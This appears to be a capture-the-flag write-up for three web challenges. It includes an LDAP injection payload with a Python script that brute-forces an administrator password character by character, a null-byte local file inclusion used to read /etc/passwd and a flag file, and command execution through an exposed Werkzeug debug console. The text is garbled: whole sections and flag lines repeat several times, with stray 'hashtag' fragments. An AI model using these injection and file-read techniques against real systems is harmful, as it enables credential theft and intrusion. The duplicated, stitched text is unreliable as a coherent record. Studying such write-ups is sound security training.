1 of 4

Web

Lightweight Contact Book

With some fuzzing we can figure out that the search is using LDAP. The forgot password message reveals that the password is in the 'description' field. This allows us to char-by-char brute the password: administrator)(description=*

Will return a result if the password matches this pattern

The pw is: very_secure_hacktivity_pass

import requests
import string
import sys
pwchars = string.ascii_lowercase + string.ascii_uppercase + "_- "

template = "http://jh2i.com:50019/?search=administrator)(description="
password = ""

while True:
    for c in pwchars:
        r = requests.get(template + password  +  c + "*")
        if "Administrator User" in r.text:
            password += c
            break
        print(password + c)
        sys.stdout.write("\033[F")

Flag:flag{kids_please_sanitize_your_inputs}

Bite

So, let's go to one of the pages, Bit for example.

We'll see the url http://jh2i.com:50010/?page=bit

?page= imlies some form of LFI may be possible, as it looks like the specified page is imported into the template. So, let's go ahead and try http://jh2i.com:50010/?page=/etc/passwd

We'll find it gives an error about /etc/passwd.php not existing. This tells us it appends .php to the end of the page parameter and includes it.

Tony told me that a null byte causes the .php to become redundant as the null byte will terminate the string.

http://jh2i.com:50010/?page=/etc/passwd%00 works, displaying /etc/passwd.

So I took a guess and tried /flag.txt%00 and that gave the flag.

Flag: flag{lfi_just_needed_a_null_byte}

Ladybug

Enter /film/aaa to trigger error and get to werkzeug prompt

import os
os.popen("cat flag.txt").read()

Flag:flag{weurkzerg_the_worst_kind_of_debug}

Bite

So, let's go to one of the pages, Bit for example.

We'll see the url http://jh2i.com:50010/?page=bit

?page= imlies some form of LFI may be possible, as it looks like the specified page is imported into the template. So, let's go ahead and try http://jh2i.com:50010/?page=/etc/passwd

We'll find it gives an error about /etc/passwd.php not existing. This tells us it appends .php to the end of the page parameter and includes it.

Tony told me that a null byte causes the .php to become redundant as the null byte will terminate the string.

http://jh2i.com:50010/?page=/etc/passwd%00 works, displaying /etc/passwd.

So I took a guess and tried /flag.txt%00 and that gave the flag.

Flag: flag{lfi_just_needed_a_null_byte}

Lightweight Contact Book

Will return a result if the password matches this pattern

The pw is: very_secure_hacktivity_pass

import requests
import string
import sys
pwchars = string.ascii_lowercase + string.ascii_uppercase + "_- "

template = "http://jh2i.com:50019/?search=administrator)(description="
password = ""

while True:
    for c in pwchars:
        r = requests.get(template + password  +  c + "*")
        if "Administrator User" in r.text:
            password += c
            break
        print(password + c)
        sys.stdout.write("\033[F")

Web

Lightweight Contact Book

hashtagFlag:flag{kids_please_sanitize_your_inputs}

Bite

hashtagFlag: flag{lfi_just_needed_a_null_byte}

Ladybug

hashtagFlag:flag{weurkzerg_the_worst_kind_of_debug}

Web

Ladybug

hashtagFlag:flag{weurkzerg_the_worst_kind_of_debug}

Bite

hashtagFlag: flag{lfi_just_needed_a_null_byte}

Lightweight Contact Book

hashtagFlag:flag{kids_please_sanitize_your_inputs}

Flag:flag{kids_please_sanitize_your_inputs}

Flag: flag{lfi_just_needed_a_null_byte}

Flag:flag{weurkzerg_the_worst_kind_of_debug}

Flag:flag{weurkzerg_the_worst_kind_of_debug}

Flag: flag{lfi_just_needed_a_null_byte}

Flag:flag{kids_please_sanitize_your_inputs}